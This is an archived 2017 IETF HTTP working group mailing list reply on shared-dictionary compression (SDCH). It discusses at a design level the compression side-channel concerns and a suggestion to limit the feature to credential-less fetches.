W3C home > Mailing lists > Public > ietf-http-wg@w3.org > January to March 2017

Re: Shared Dictionaries (SDCH and friends)

From: Martin Thomson <martin.thomson@gmail.com>
Date: Fri, 20 Jan 2017 17:08:49 +1300
Message-ID: <CABkgnnVYWJ9OhmROnd2NCX=A8_tHyQge0kUp4bTBj5eiRy8sCA@mail.gmail.com>
To: chaals@yandex-team.ru
Cc: HTTP Working Group <ietf-http-wg@w3.org>
Hey Chaals,

In case you missed the suggestion at the last meeting from Vlad, he
suggested that this only be offered for use with fetches with a
credentials-mode (See
https://fetch.spec.whatwg.org/#concept-request-credentials-mode) of
"omit".  That is, don't make it possible for the server to use ambient
authority (including cookies) to customize the request.  I don't think
that completely removes the concern, but it helps.

I don't think that having tools for separating "possibly under
attacker influence" and "secret" is going to solve the issue.  That's
already possible with existing compression techniques; the concern is
over the usability of those tools and the ability to correctly
identify data as belonging to each category.

On 20 January 2017 at 16:48,  <chaals@yandex-team.ru> wrote:
> Additionally, since this is a new powerful feature, there is no reason not to restrict it to secure connections.

FWIW, the security concerns ONLY apply to secure connections, so you
needn't worry about this bit.  If you are going to spray your secrets
all over the internet, traffic analysis isn't really your most
pressing concern.
Received on Friday, 20 January 2017 04:09:22 UTC

This archive was generated by hypermail 2.4.0 : Friday, 17 January 2020 17:14:59 UTC